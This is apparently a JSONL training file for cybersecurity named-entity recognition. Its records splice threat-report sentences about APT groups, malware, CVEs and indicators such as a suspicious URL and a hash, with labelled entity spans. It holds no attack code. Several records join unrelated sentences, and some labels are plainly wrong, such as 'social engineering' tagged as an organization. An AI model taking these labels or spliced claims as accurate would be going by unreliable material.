{"text": "The CrowdStrike has been tracking this particular unit since 2012 , under the codename PUTTER PANDA , and has documented activity dating back to 2007 . In March 2014 , the gang behind Potao started using a new infection vector .", "spans": {"ORGANIZATION: CrowdStrike": [[4, 15]], "THREAT_ACTOR: PUTTER PANDA": [[87, 99]], "MALWARE: Potao": [[184, 189]], "MALWARE: infection vector": [[210, 226]]}, "info": {"id": "cyberner_stix_train_002413", "source": "cyberner_stix_train"}}
{"text": "It collects information about the smartphone ( IMEI , country , service provider , operating system language ) and sends it to the host via the HTTP POST request . Turla is a notorious group that has been targeting government officials . The IoCs are also available in our GitHub repository . Other big stories in June include a suspected LockBit affiliate arrest , the Royal ransomware gang toying with a new encryptor , and a notable increase in attacks on the Manufacturing sector .", "spans": {"THREAT_ACTOR: Turla": [[164, 169]], "ORGANIZATION: government officials": [[215, 235]], "TOOL: GitHub": [[273, 279]], "THREAT_ACTOR: LockBit": [[339, 346]], "THREAT_ACTOR: Royal ransomware gang": [[370, 391]], "TOOL: new encryptor": [[406, 419]], "ORGANIZATION: Manufacturing sector": [[463, 483]]}, "info": {"id": "cyberner_stix_train_002414", "source": "cyberner_stix_train"}}
{"text": "Figure 1 shows a sample phishing email used by HawkEye operators in this latest campaign . APT28 espionage activity has primarily targeted entities in the U.S. , Europe , and the countries of the former Soviet Union , including governments and militaries , defense attaches , media entities , and dissidents and figures opposed to the current Russian government .", "spans": {"MALWARE: phishing email": [[24, 38]], "ORGANIZATION: governments": [[228, 239]], "ORGANIZATION: militaries": [[244, 254]], "ORGANIZATION: defense attaches": [[257, 273]], "ORGANIZATION: media entities": [[276, 290]], "ORGANIZATION: dissidents": [[297, 307]], "ORGANIZATION: figures": [[312, 319]], "ORGANIZATION: Russian government": [[343, 361]]}, "info": {"id": "cyberner_stix_train_002415", "source": "cyberner_stix_train"}}
{"text": "Giving an attacker access to a mobile device can have severe business consequences , especially if the end user is using their mobile device to discuss sensitive business topics or access enterprise financial information . In July of 2015 , we identified a full e-mail uploaded to an antivirus scanning service that carried a Scarlet Mimic exploit document . This report is an initial public release of research PwC UK and BAE Systems have conducted into new , sustained global campaigns by an established threat actor against managed IT service providers and their clients as well as several directly targeted organisations in Japan .", "spans": {"VULNERABILITY: Scarlet Mimic exploit": [[326, 347]], "ORGANIZATION: PwC UK": [[412, 418]], "ORGANIZATION: BAE Systems": [[423, 434]], "ORGANIZATION: managed IT service providers": [[527, 555]]}, "info": {"id": "cyberner_stix_train_002416", "source": "cyberner_stix_train"}}
{"text": "In the following image , we can see how the malware receives a JSON object from the C & C server containing the command to start recording , the targeted apps and the recorded video size ratio . Georgian military security issues , particularly with regard to U.S. cooperation and NATO , provide a strong incentive for Russian state-sponsored threat actors to steal information that sheds light on these topics . Another such an exceptional espionage platform is \" ProjectSauron , also known as \" Strider \" .", "spans": {"THREAT_ACTOR: threat actors": [[342, 355]], "MALWARE: ProjectSauron": [[464, 477]], "THREAT_ACTOR: Strider": [[496, 503]]}, "info": {"id": "cyberner_stix_train_002417", "source": "cyberner_stix_train"}}
{"text": "We believe that this is the reason the DEFENSOR ID trojan requests the user to allow “ Modify system settings ” . In the campaign that targeted Japan , Philippines , and Argentina on June 20 , we found what seems to be a new , undisclosed malware , which we named Gelup . The Lazarus Group 's objective was to gain access to the target 's environment and obtain key military program insight or steal money .", "spans": {"MALWARE: DEFENSOR ID": [[39, 50]], "MALWARE: Gelup": [[264, 269]], "THREAT_ACTOR: Lazarus Group": [[276, 289]]}, "info": {"id": "cyberner_stix_train_002418", "source": "cyberner_stix_train"}}
{"text": "Similar to other malware seen in the past , Charger checks the local settings of the device and does not run its malicious logic if the device is located in Ukraine , Russia , or Belarus . In two months , the group returned to their proven method and withdrew funds again through ATMs . During the investigation into FIN7 , our threat-hunting systems found an interesting overlap in between the infrastructure of FIN7 and AveMaria . It even can restrict forms to be sent only to specific hosts , using the form - action directive .", "spans": {"MALWARE: Charger": [[44, 51]], "THREAT_ACTOR: FIN7": [[317, 321], [413, 417]], "MALWARE: AveMaria": [[422, 430]]}, "info": {"id": "cyberner_stix_train_002419", "source": "cyberner_stix_train"}}
{"text": "It encodes strings into binary arrays , making it hard to inspect them . We conclude that the actor behind the attack is Silence group , a relatively new threat actor that's been operating since mid-2016 . Thirty percent of the targets were small and medium-sized companies that were suppliers or service providers for bigger players and 21% were various types of manufacturing companies . Looking at the top 3 M domains , only 210 K use CSP .", "spans": {"SYSTEM: CSP": [[438, 441]]}, "info": {"id": "cyberner_stix_train_002420", "source": "cyberner_stix_train"}}
{"text": "Since then , the number and diversity of components has increased drastically .", "spans": {}, "info": {"id": "cyberner_stix_train_002421", "source": "cyberner_stix_train"}}
{"text": "TG-3390 actors frequently change the C2 domain's A record to point to the loopback IP address 127.0.0.1 , which is a variation of a technique known as \" parking \" .", "spans": {"THREAT_ACTOR: TG-3390": [[0, 7]], "TOOL: C2": [[37, 39]], "IP_ADDRESS: 127.0.0.1": [[94, 103]]}, "info": {"id": "cyberner_stix_train_002423", "source": "cyberner_stix_train"}}
{"text": "The Emissary Panda threat group loaded the China Chopper webshell onto SharePoint servers at two Government organizations in the Middle East , which we believe with high confidence involved exploiting a remote code execution vulnerability in SharePoint tracked in CVE-2019-0604 . The RAT , however , had a multitude of functionalities (as listed in the table below) such as to download and execute , compress , encrypt , upload , search directories , etc .", "spans": {"THREAT_ACTOR: Emissary Panda": [[4, 18]], "TOOL: China Chopper": [[43, 56]], "VULNERABILITY: CVE-2019-0604": [[264, 277]], "FILEPATH: RAT": [[284, 287]]}, "info": {"id": "cyberner_stix_train_002424", "source": "cyberner_stix_train"}}
{"text": "The end of January 2015 saw the start of the most high- volume Duke campaign seen thus far , with thousands of recipients being sent spear-phishing emails that contained links to compromised websites hosting CozyDuke .", "spans": {"THREAT_ACTOR: Duke": [[63, 67]], "TOOL: emails": [[148, 154]], "MALWARE: CozyDuke": [[208, 216]]}, "info": {"id": "cyberner_stix_train_002425", "source": "cyberner_stix_train"}}
{"text": "Figure 2 below shows how the delivery document initially looks and the transformation the content undergoes as the macro runs .", "spans": {"TOOL: macro": [[115, 120]]}, "info": {"id": "cyberner_stix_train_002426", "source": "cyberner_stix_train"}}
{"text": "The FBI has publicly attributed this activity to a nation-state actor and took subsequent actions to disrupt this botnet , although the devices would remain vulnerable to re-infection unless proper firmware or security controls were put in place by the user .", "spans": {"ORGANIZATION: FBI": [[4, 7]]}, "info": {"id": "cyberner_stix_train_002427", "source": "cyberner_stix_train"}}
{"text": "This command can be used not just to update the app but to install any other software on the infected device . Their next move was to list any remote shared drives and then attempt to access remote shares owned by the specific government office they were targeting , again attempting to extract all Word documents . As of early June 2018 , the server hosted 112 files in a subdirectory that could be accessed through a public web shell planted by the Leafminer .", "spans": {"ORGANIZATION: government office": [[227, 244]], "MALWARE: Word documents": [[299, 313]], "MALWARE: public web shell": [[419, 435]], "THREAT_ACTOR: Leafminer": [[451, 460]]}, "info": {"id": "cyberner_stix_train_002428", "source": "cyberner_stix_train"}}
{"text": "One of the tell-tale signs of an obfuscated malware is the absence of code that defines the classes declared in the manifest file . During our period of visibility into the BS2005 \" moviestar \" campaign against various ministries of foreign affairs in Europe , FireEye discovered that the Ke3chang had initially tested the malware in virtual machines , prior to compromising actual targets . We spotted a courier themed spam campaign on our Secure Email Gateway (SEG ) cloud . After further research , we were able to link Hack520 to different network administration activities , notably with a Virtual Private Server ( VPS ) hosting service .", "spans": {"ORGANIZATION: ministries of foreign affairs": [[219, 248]], "ORGANIZATION: FireEye": [[261, 268]], "THREAT_ACTOR: Ke3chang": [[289, 297]], "TOOL: Secure Email Gateway": [[441, 461]], "TOOL: (SEG": [[462, 466]], "THREAT_ACTOR: Hack520": [[523, 530]], "SYSTEM: Virtual Private Server ( VPS ) hosting service": [[595, 641]]}, "info": {"id": "cyberner_stix_train_002429", "source": "cyberner_stix_train"}}
{"text": "] it Firenze server2mi.exodus.connexxa [ . Dragos identified several compromises of ICS vendors and manufacturers in 2018 by activity associated with XENOTIME , providing potential supply chain threat opportunities and vendor-enabled access to asset owner and operator ICS networks . URL : http://nicoledotson.icu/debby/weatherford/Ekspertyza . Once they successfully breached a network , MuddyWater attempted to steal credentials and move laterally .", "spans": {"ORGANIZATION: Dragos": [[43, 49]], "TOOL: ICS vendors and manufacturers": [[84, 113]], "THREAT_ACTOR: XENOTIME": [[150, 158]], "TOOL: ICS networks": [[269, 281]], "URL: http://nicoledotson.icu/debby/weatherford/Ekspertyza": [[290, 342]], "THREAT_ACTOR: MuddyWater": [[389, 399]]}, "info": {"id": "cyberner_stix_train_002430", "source": "cyberner_stix_train"}}
{"text": "We believe that during the spring of 2010 , the credential and file stealing capabilities of PinchDuke were slowly ported to CosmicDuke , effectively making PinchDuke obsolete .", "spans": {"MALWARE: PinchDuke": [[93, 102], [157, 166]], "MALWARE: CosmicDuke": [[125, 135]]}, "info": {"id": "cyberner_stix_train_002431", "source": "cyberner_stix_train"}}
{"text": "PICKPOCKET is a credential theft tool that dumps the user's website login credentials from Chrome , Firefox , and Internet Explorer to a file . Bookworm 's functional code is radically different from PlugX and has a rather unique modular architecture that warranted additional analysis by Unit 42 .", "spans": {"MALWARE: PICKPOCKET": [[0, 10]], "MALWARE: Bookworm": [[144, 152]], "MALWARE: PlugX": [[200, 205]], "ORGANIZATION: Unit 42": [[289, 296]]}, "info": {"id": "cyberner_stix_train_002432", "source": "cyberner_stix_train"}}
{"text": "The malware was first seen packed with VMProtect; when unpacked the sample didn’t show any similarities with previously known malware . Previously , Cloud Atlas dropped its validator” implant named PowerShower” directly , after exploiting the Microsoft Equation vulnerability CVE-2017-11882 mixed with CVE-2018-0802 .", "spans": {"MALWARE: malware": [[4, 11]], "THREAT_ACTOR: Cloud Atlas": [[149, 160]], "ORGANIZATION: Microsoft": [[243, 252]], "VULNERABILITY: CVE-2017-11882": [[276, 290]], "VULNERABILITY: CVE-2018-0802": [[302, 315]]}, "info": {"id": "cyberner_stix_train_002433", "source": "cyberner_stix_train"}}
{"text": "Yes , we are talking about SuperMarioRun , which was recently launched by Nintendo only for iOS users . A BASF spokeswoman tells us in an email that in July 2015 , hackers had successfully overcome the rst levels” of defense . Rather , the Gallmaker 's attack activity we observed is carried out exclusively using LotL tactics and publicly available hack tools .", "spans": {"SYSTEM: SuperMarioRun": [[27, 40]], "ORGANIZATION: Nintendo": [[74, 82]], "SYSTEM: iOS": [[92, 95]], "THREAT_ACTOR: hackers": [[164, 171]], "THREAT_ACTOR: Gallmaker": [[240, 249]], "MALWARE: LotL": [[314, 318]], "MALWARE: publicly available hack tools": [[331, 360]]}, "info": {"id": "cyberner_stix_train_002434", "source": "cyberner_stix_train"}}
{"text": "Although something had already been published , we decided to do something different with the data we acquired . On April 24 , 2019 , Fxmsp claimed to have secured access to three leading antivirus companies . This malware uses the public privilege escalation exploit code CVE-2018-8120 or UACME which is normally used by legitimate red teams . We will continue to monitor these campaigns and in particular SocGholish to see if the web delivery landscape changes .", "spans": {"THREAT_ACTOR: Fxmsp": [[134, 139]], "ORGANIZATION: antivirus companies": [[188, 207]], "VULNERABILITY: CVE-2018-8120": [[273, 286]], "VULNERABILITY: UACME": [[290, 295]], "MALWARE: SocGholish": [[407, 417]]}, "info": {"id": "cyberner_stix_train_002435", "source": "cyberner_stix_train"}}
{"text": "We believe that an industry-wide collaboration and information-sharing is important in defending customers against this complex piece of malware . In 2011 , three years after the most recent release of PIVY , attackers used the RAT to compromise security firm RSA and steal data about its SecureID authentication system . While we are still in the process of analyzing this backdoor’s full functionality , it seems to be similar to the Remy backdoor described in our previous whitepaper on OceanLotus malware . The group behind the Winnti malware ( which we will call the Winnti group for brevity ) sprung up as a band of traditional cyber crooks , comprising black hats whose technical skills were employed to perpetrate financial fraud .", "spans": {"TOOL: PIVY": [[202, 206]], "THREAT_ACTOR: attackers": [[209, 218]], "TOOL: RAT": [[228, 231]], "ORGANIZATION: security firm RSA": [[246, 263]], "MALWARE: Remy backdoor": [[436, 449]], "THREAT_ACTOR: OceanLotus": [[490, 500]], "MALWARE: Winnti malware": [[532, 546]], "THREAT_ACTOR: Winnti group": [[572, 584]], "THREAT_ACTOR: traditional cyber crooks": [[622, 646]], "THREAT_ACTOR: black hats whose technical skills were employed to perpetrate financial fraud": [[660, 737]]}, "info": {"id": "cyberner_stix_train_002436", "source": "cyberner_stix_train"}}
{"text": "Orangeworm 's secondary targets include Manufacturing , Information Technology , Agriculture , and Logistics . We chose the name ' MoonWind ' based on debugging strings we saw within the samples , as well as the compiler used to generate the samples .", "spans": {"ORGANIZATION: Manufacturing": [[40, 53]], "ORGANIZATION: Information Technology": [[56, 78]], "ORGANIZATION: Agriculture": [[81, 92]], "ORGANIZATION: Logistics": [[99, 108]], "MALWARE: MoonWind": [[131, 139]]}, "info": {"id": "cyberner_stix_train_002437", "source": "cyberner_stix_train"}}
{"text": "APT32 actors continue to deliver the malicious attachments via spear-phishing emails . This focus on training aligns with LYCEUM’s targeting of executives , HR staff , and IT personnel .", "spans": {"THREAT_ACTOR: APT32": [[0, 5]], "MALWARE: malicious attachments": [[37, 58]], "THREAT_ACTOR: LYCEUM’s": [[122, 130]], "ORGANIZATION: executives": [[144, 154]], "ORGANIZATION: HR staff": [[157, 165]], "ORGANIZATION: IT personnel": [[172, 184]]}, "info": {"id": "cyberner_stix_train_002438", "source": "cyberner_stix_train"}}
{"text": "Since then we have identified a number of attacks over a two-year period , beginning in April 2014 , which we attribute to Suckfly .", "spans": {"THREAT_ACTOR: Suckfly": [[123, 130]]}, "info": {"id": "cyberner_stix_train_002439", "source": "cyberner_stix_train"}}
{"text": "As a result of a lot of hard work done by our security research teams , we revealed today a new and alarming malware campaign . APT38 's operations began in February 2014 and were likely influenced by financial sanctions enacted in March 2013 that blocked bulk cash transfers and restricted North Korea 's access to international banking systems . Rolles also provides an overview of each obfuscation technique in the same post . Hildegard has used an IRC channel for C2 communications.[6 ]", "spans": {"THREAT_ACTOR: APT38": [[128, 133]], "SYSTEM: IRC channel": [[452, 463]], "SYSTEM: C2 communications.[6": [[468, 488]]}, "info": {"id": "cyberner_stix_train_002440", "source": "cyberner_stix_train"}}
{"text": "In some of the latest samples of BalkanDoor detected in 2019 , the malware is distributed as an ACE archive , disguised as a RAR archive (i.e , not an executable file) , specially crafted to exploit the WinRAR ACE vulnerability CVE-2018-20250 . CVE-2018-0798 is an RCE vulnerability , a stack buffer overflow that can be exploited by a threat actor to perform stack corruption .", "spans": {"MALWARE: BalkanDoor": [[33, 43]], "VULNERABILITY: CVE-2018-20250": [[228, 242]], "VULNERABILITY: CVE-2018-0798": [[245, 258]]}, "info": {"id": "cyberner_stix_train_002442", "source": "cyberner_stix_train"}}
{"text": "BRONZE PRESIDENT Targets NGOs .", "spans": {"THREAT_ACTOR: BRONZE PRESIDENT": [[0, 16]], "ORGANIZATION: NGOs": [[25, 29]]}, "info": {"id": "cyberner_stix_train_002443", "source": "cyberner_stix_train"}}
{"text": "Call Command Figure 9 : The calling functionality . CVE-2017-0143 was also used by two other exploit tools—EternalRomance and EternalSynergy—that were released as part of the Shadow Brokers leak in April 2017 . Threat Group-3390 is a Chinese threat group that extensively used strategic Web compromises to target victims .", "spans": {"VULNERABILITY: CVE-2017-0143": [[52, 65]], "MALWARE: tools—EternalRomance": [[101, 121]], "MALWARE: EternalSynergy—that": [[126, 145]], "THREAT_ACTOR: Threat Group-3390": [[211, 228]]}, "info": {"id": "cyberner_stix_train_002444", "source": "cyberner_stix_train"}}
{"text": "POWRUNER was delivered using a malicious RTF file that exploited CVE-2017-0199 . The detection evasion techniques we observed in the Okrum malware include embedding the malicious payload within a legitimate PNG image , employing several anti-emulation and anti-sandbox tricks , as well as making frequent changes in implementation .", "spans": {"TOOL: POWRUNER": [[0, 8]], "MALWARE: RTF file": [[41, 49]], "VULNERABILITY: CVE-2017-0199": [[65, 78]], "FILEPATH: Okrum": [[133, 138]]}, "info": {"id": "cyberner_stix_train_002445", "source": "cyberner_stix_train"}}
{"text": "] 175 [ . On May 16 , 2019 FireEye 's Advanced Practices team attributed the remaining \" suspected APT33 activity \" to APT33 , operating at the behest of the Iranian government . Mechanisms vary for different OS . How to locate where stack strings are decoded Every Block of stack strings ends with followed by a .", "spans": {"ORGANIZATION: FireEye 's Advanced Practices": [[27, 56]], "THREAT_ACTOR: APT33": [[119, 124]]}, "info": {"id": "cyberner_stix_train_002446", "source": "cyberner_stix_train"}}
{"text": "Enable a secure lock screen : Pick a PIN , pattern , or password that is easy for you to remember and hard for others to guess . This means that the Leafminer group is targeting electric utilities . The embedded payload data has a specific structure , that is parsed by the added unpacking code . Rhysida ’s encryption algorithm is relatively straightforward and uses the ChaCha20 encryption algorithm .", "spans": {"THREAT_ACTOR: Leafminer group": [[149, 164]], "ORGANIZATION: electric utilities": [[178, 196]], "MALWARE: Rhysida ’s encryption algorithm": [[297, 328]]}, "info": {"id": "cyberner_stix_train_002447", "source": "cyberner_stix_train"}}
{"text": "That is actually how the bad guys decided to monetize the Trojan . Researchers at Kaspersky Lab privately disclosed the flaw to Adobe after exploits against the zero-day were used in March by the ScarCruft APT gang in what Kaspersky Lab is calling Operation Daybreak . The two variants of Helminth do require different delivery methods , with the script variant relying on an Excel spreadsheet for delivery , while the executable variant is more traditional in the fact that it can be installed without a delivery document .", "spans": {"ORGANIZATION: Kaspersky Lab": [[82, 95], [223, 236]], "VULNERABILITY: zero-day": [[161, 169]], "MALWARE: Helminth": [[289, 297]]}, "info": {"id": "cyberner_stix_train_002448", "source": "cyberner_stix_train"}}
{"text": "The Trojan displays a phishing page ( bank.html ) prompting the user to enter their bank card details . We identified an overlap in the domain voguextra.com , which was used by Bahamut within their \" Devoted To Humanity \" app to host an image file and as C2 server by the PrayTime iOS app mentioned in our first post . This means that the Leafminer group is targeting electric utilities .", "spans": {"THREAT_ACTOR: Bahamut": [[177, 184]], "MALWARE: Devoted To Humanity": [[200, 219]], "THREAT_ACTOR: Leafminer group": [[339, 354]], "ORGANIZATION: electric utilities": [[368, 386]]}, "info": {"id": "cyberner_stix_train_002449", "source": "cyberner_stix_train"}}
{"text": "Throughout the final quarter of 2016 and first month of 2017 , FireEye Dynamic Threat Intelligence (DTI) observed consistent Magnitude EK hits from several customers , the majority of whom reside in the APAC region . Per the complaint , the email account watsonhenny@gmail.com was used to send LinkedIn invitations to employees of a bank later targeted by APT38 .", "spans": {"ORGANIZATION: FireEye": [[63, 70]], "TOOL: Magnitude EK": [[125, 137]], "EMAIL: watsonhenny@gmail.com": [[255, 276]], "ORGANIZATION: employees": [[318, 327]], "THREAT_ACTOR: APT38": [[356, 361]]}, "info": {"id": "cyberner_stix_train_002450", "source": "cyberner_stix_train"}}
{"text": "The path that is used for the uploads is : http : // /apps/d/p/op.php The communication looks like this : First Phase The first phase of the app ’ s attack flow collects device information and a list of apps installed on the device . We assess the targeting of multiple companies with aviation-related partnerships to Saudi Arabia indicates that APT33 may possibly be looking to gain insights on Saudi Arabia 's military aviation capabilities to enhance Iran 's domestic aviation capabilities or to support Iran 's military and strategic decision making vis a vis Saudi Arabia . This blogpost is based in our original report shared with our APT Intelligence Reporting customers last November 2018 . That 's because a new ransomware called BlackSuit had appeared which shared 98 percent of its code with the infamous Royal ransomware .", "spans": {"THREAT_ACTOR: APT33": [[346, 351]], "ORGANIZATION: military": [[515, 523]], "MALWARE: BlackSuit": [[739, 748]], "MALWARE: Royal ransomware": [[816, 832]]}, "info": {"id": "cyberner_stix_train_002451", "source": "cyberner_stix_train"}}
{"text": "The backdoor was delivered via a malicious .rtf file that exploited CVE-2017-0199 . Once BARIUM has established rapport , they spear-phish the victim using a variety of unsophisticated malware installation vectors , including malicious shortcut ( .lnk ) files with hidden payloads , compiled HTML help ( .chm ) files , or Microsoft Office documents containing macros or exploits .", "spans": {"MALWARE: .rtf file": [[43, 52]], "VULNERABILITY: CVE-2017-0199": [[68, 81]], "MALWARE: unsophisticated": [[169, 184]], "MALWARE: malware": [[185, 192]], "MALWARE: malicious shortcut": [[226, 244]], "FILEPATH: .lnk": [[247, 251]], "MALWARE: HTML help ( .chm ) files": [[292, 316]], "MALWARE: Microsoft Office documents": [[322, 348]]}, "info": {"id": "cyberner_stix_train_002452", "source": "cyberner_stix_train"}}
{"text": "NetWire , DarkComet , NanoCore , LuminosityLink , Remcos and Imminent Monitor are all designed to provide remote access to compromised systems . Given our increased confidence that Bahamut was responsible for targeting of Qatari labor rights advocates and its focus on the foreign policy institutions other Gulf states , Bahamut 's interests are seemingly too expansive to be limited one sponsor or customer .", "spans": {"TOOL: NetWire": [[0, 7]], "TOOL: DarkComet": [[10, 19]], "TOOL: NanoCore": [[22, 30]], "TOOL: LuminosityLink": [[33, 47]], "TOOL: Remcos": [[50, 56]], "TOOL: Imminent Monitor": [[61, 77]], "ORGANIZATION: labor rights advocates": [[229, 251]], "ORGANIZATION: foreign policy institutions": [[273, 300]]}, "info": {"id": "cyberner_stix_train_002453", "source": "cyberner_stix_train"}}
{"text": "In one case from 2013 , the target was sent a malicious document through a spear phishing email message . The group 's spearphish toolset includes PDF exploits , Adobe Flash Player exploits , and the common CVE-2012-0158 Word exploits including those generated from the infamous \" Tran Duy Linh \" kit .", "spans": {"MALWARE: malicious document": [[46, 64]], "TOOL: PDF": [[147, 150]], "VULNERABILITY: exploits": [[151, 159], [181, 189], [226, 234]], "TOOL: Adobe Flash Player": [[162, 180]], "VULNERABILITY: CVE-2012-0158": [[207, 220]], "TOOL: Word": [[221, 225]], "MALWARE: Tran Duy Linh": [[281, 294]]}, "info": {"id": "cyberner_stix_train_002454", "source": "cyberner_stix_train"}}
{"text": "Error Registration Ok Empty SendSMS RequestGoogleCC Wipe OpenBrowser SendUSSD RequestSMSList RequestAppList RequestLocation ShowNotification SetLockPassword LockNow MuteSound LoadScript LoadPlugin ServerChange StartApp CallPhone SetPingTimer SMSBroadcast RequestContacts AddInject RemoveInject Evaluate Another feature of this trojan is the ability to register injects , which are JavaScript snippets of code . In May 2019 , the threat group launched a campaign against oil and gas organizations in the Middle East . Based on observed activity , we judge that APT38 's primary mission is targeting financial institutions and manipulating inter-bank financial systems to raise large sums of money for the North Korean regime .", "spans": {"THREAT_ACTOR: group": [[436, 441]], "THREAT_ACTOR: APT38": [[560, 565]], "ORGANIZATION: financial institutions": [[598, 620]]}, "info": {"id": "cyberner_stix_train_002455", "source": "cyberner_stix_train"}}
{"text": "The group also uses the SQL injection (SQLi) tools Havij Advanced SQL Injection Tool and SQLi Dumper version 7.0 (Figure 4) to scan for and exploit vulnerabilities in targeted eCommerce sites . It was during operator X 's network monitoring that the attackers placed Naikon proxies within the countries ' borders , to cloak and support real-time outbound connections and data Exfiltration from high-profile victim organizations .", "spans": {"THREAT_ACTOR: group": [[4, 9]], "TOOL: SQL injection": [[24, 37]], "THREAT_ACTOR: attackers": [[250, 259]], "MALWARE: Naikon proxies": [[267, 281]]}, "info": {"id": "cyberner_stix_train_002456", "source": "cyberner_stix_train"}}
{"text": "This technique bypasses AppLocker restrictions and permits the execution of code within the SCT file .", "spans": {"TOOL: AppLocker": [[24, 33]]}, "info": {"id": "cyberner_stix_train_002457", "source": "cyberner_stix_train"}}
{"text": "This tool has been used by several Chinese-affiliated threat actors , such as APT 27 and APT 40 . Clever Kitten actors have a strong affinity for PHP server-side attacks to make access ; this is relatively unique amongst targeted attackers who often favor targeting a specific individual at a specific organization using social engineering .", "spans": {"THREAT_ACTOR: threat actors": [[54, 67]], "THREAT_ACTOR: APT 27": [[78, 84]], "THREAT_ACTOR: APT 40": [[89, 95]], "THREAT_ACTOR: Clever Kitten": [[98, 111]], "ORGANIZATION: individual": [[277, 287]], "ORGANIZATION: social engineering": [[321, 339]]}, "info": {"id": "cyberner_stix_train_002458", "source": "cyberner_stix_train"}}
{"text": "The GolfSpy malware embedded in the apps is hardcoded with an internal name used by the attacker . Nevertheless , resourceful threat actors such as ScarCruft will probably continue to deploy zero-day exploits against their high profile targets . The second one , which in many cases is an Office document protected with a trivial password , such as “ 12345 ” , “ 1234 ” , etc. , uses macros to execute a GRIFFON implant on the target’s computer . Whether known as commodity malware or “ as - a - service , ” threat actors have long been turning to their fellow adversaries in the hopes of selling off their tools and opening a new stream of revenue .", "spans": {"MALWARE: GolfSpy": [[4, 11]], "THREAT_ACTOR: ScarCruft": [[148, 157]], "VULNERABILITY: zero-day exploits": [[191, 208]], "TOOL: Office": [[289, 295]], "TOOL: macros": [[384, 390]], "MALWARE: GRIFFON": [[404, 411]], "MALWARE: commodity malware": [[464, 481]], "THREAT_ACTOR: threat actors": [[508, 521]]}, "info": {"id": "cyberner_stix_train_002459", "source": "cyberner_stix_train"}}
{"text": "This connection suggests that the group uses phishing emails with ZIP attachments that contain LNK files as an initial access vector .", "spans": {"TOOL: emails": [[54, 60]], "TOOL: ZIP": [[66, 69]], "TOOL: LNK": [[95, 98]]}, "info": {"id": "cyberner_stix_train_002460", "source": "cyberner_stix_train"}}
{"text": "We decided to spend some time to investigate around this malware and found out that it was used exclusively by a single group of attackers . Myanmar has been the target of Mofang 's attacks for years before the campaign related to the sez .", "spans": {"THREAT_ACTOR: group": [[120, 125]], "THREAT_ACTOR: attackers": [[129, 138]], "THREAT_ACTOR: Mofang": [[172, 178]]}, "info": {"id": "cyberner_stix_train_002461", "source": "cyberner_stix_train"}}
{"text": "Comparing the GeminiDuke compilation timestamps , which always reference the time in the UTC+0 timezone , with the local time timestamps used as mutex names , and adjusting for the presumed timezone difference , we note that all of the mutex names reference a time and date that is within seconds of the respective sample ’s compilation timestamp .", "spans": {"MALWARE: GeminiDuke": [[14, 24]]}, "info": {"id": "cyberner_stix_train_002462", "source": "cyberner_stix_train"}}
{"text": "The list of information collected includes :", "spans": {}, "info": {"id": "cyberner_stix_train_002463", "source": "cyberner_stix_train"}}
{"text": "MITRE ATT & CK techniques Tactic ID Name Description Initial Access T1475 Deliver Malicious App via Authorized App Store The malware impersonates legitimate services on Google Play Persistence T1402 App Auto-Start at Device Boot An Android application can listen for the BOOT_COMPLETED broadcast , ensuring that the app 's functionality will be activated every time the device starts Impact T1472 Generate Fraudulent Advertising Revenue Generates revenue by automatically displaying ads The Rotexy mobile Trojan – banker and ransomware 22 NOV 2018 On Whitefly first infects its victims using a dropper in the form of a malicious.exe or .dll file that is disguised as a document or image . Therefore , it is possible that additional HIDDEN COBRA malware may be present on network infrastructure compromised with Volgmer .", "spans": {"ORGANIZATION: MITRE": [[0, 5]], "SYSTEM: Google Play": [[169, 180]], "MALWARE: Rotexy": [[491, 497]], "THREAT_ACTOR: Whitefly": [[551, 559]], "TOOL: dropper": [[594, 601]], "MALWARE: malicious.exe": [[619, 632]], "MALWARE: .dll file": [[636, 645]], "MALWARE: HIDDEN COBRA malware": [[732, 752]], "MALWARE: Volgmer": [[811, 818]]}, "info": {"id": "cyberner_stix_train_002464", "source": "cyberner_stix_train"}}
{"text": "There are several strings and labels still mentioning 'test ' or 'testcc ' — even the URL used for the credit card data exfiltration is named \" testcc.php . The developer consistently used Accept-Enconding” (note the extra ‘n’) in all DanBot samples analyzed by CTU researchers . APT38 also targeted financial transaction exchange companies likely because of their proximity to banks .", "spans": {"MALWARE: DanBot": [[235, 241]], "ORGANIZATION: CTU": [[262, 265]], "THREAT_ACTOR: APT38": [[280, 285]], "ORGANIZATION: financial transaction exchange companies": [[300, 340]], "ORGANIZATION: banks": [[378, 383]]}, "info": {"id": "cyberner_stix_train_002465", "source": "cyberner_stix_train"}}
{"text": "In activity analyzed by CTU researchers , TG-3390 executed the Hunter web application scanning tool against a target server running IIS .", "spans": {"ORGANIZATION: CTU": [[24, 27]], "THREAT_ACTOR: TG-3390": [[42, 49]], "TOOL: Hunter": [[63, 69]], "TOOL: IIS": [[132, 135]]}, "info": {"id": "cyberner_stix_train_002466", "source": "cyberner_stix_train"}}
{"text": "In this way , the malware authors can submit their app and add the malicious capabilities only after their app is live on the Play Store . During that phase , the APT32 operated a fileless PowerShell-based infrastructure , using customized PowerShell payloads taken from known offensive frameworks such as Cobalt Strike , PowerSploit and Nishang . Chafer used Remexi malware to spy on Iran-based foreign diplomatic entities Throughout the autumn of 2018 we analyzed a long-standing (and still active at that time) cyber-espionage campaign that was primarily targeting foreign diplomatic entities based in Iran . STRATOFEAR ( com.google.kservice , us.zoom . ZoomService )", "spans": {"SYSTEM: Play Store": [[126, 136]], "THREAT_ACTOR: APT32": [[163, 168]], "TOOL: customized PowerShell": [[229, 250]], "TOOL: Cobalt Strike": [[306, 319]], "TOOL: PowerSploit": [[322, 333]], "TOOL: Nishang": [[338, 345]], "THREAT_ACTOR: Chafer": [[348, 354]], "MALWARE: Remexi": [[360, 366]], "MALWARE: STRATOFEAR": [[612, 622]]}, "info": {"id": "cyberner_stix_train_002467", "source": "cyberner_stix_train"}}
{"text": "] fun , you-foto [ . TG-3390 SWCs may be largely geographically independent , but the group 's most frequently used C2 registrars and IP net blocks are located in the U.S . 0c458dfe0a2a01ab300c857fdc3373b75fbb8ccfa23d16eff0d6ab888a1a28f6 The utility is located in the “ \\sc\\prog\\exec ” folder within the MicroSCADA installation directory , amongst other utilities , libraries , and resources used by MicroSCADA .", "spans": {"THREAT_ACTOR: TG-3390": [[21, 28]]}, "info": {"id": "cyberner_stix_train_002468", "source": "cyberner_stix_train"}}
{"text": "Another profile using the handle on a Russian social network currently shows multiple photos of the user in proximity to Moscow for the entire history of the profile .", "spans": {}, "info": {"id": "cyberner_stix_train_002469", "source": "cyberner_stix_train"}}
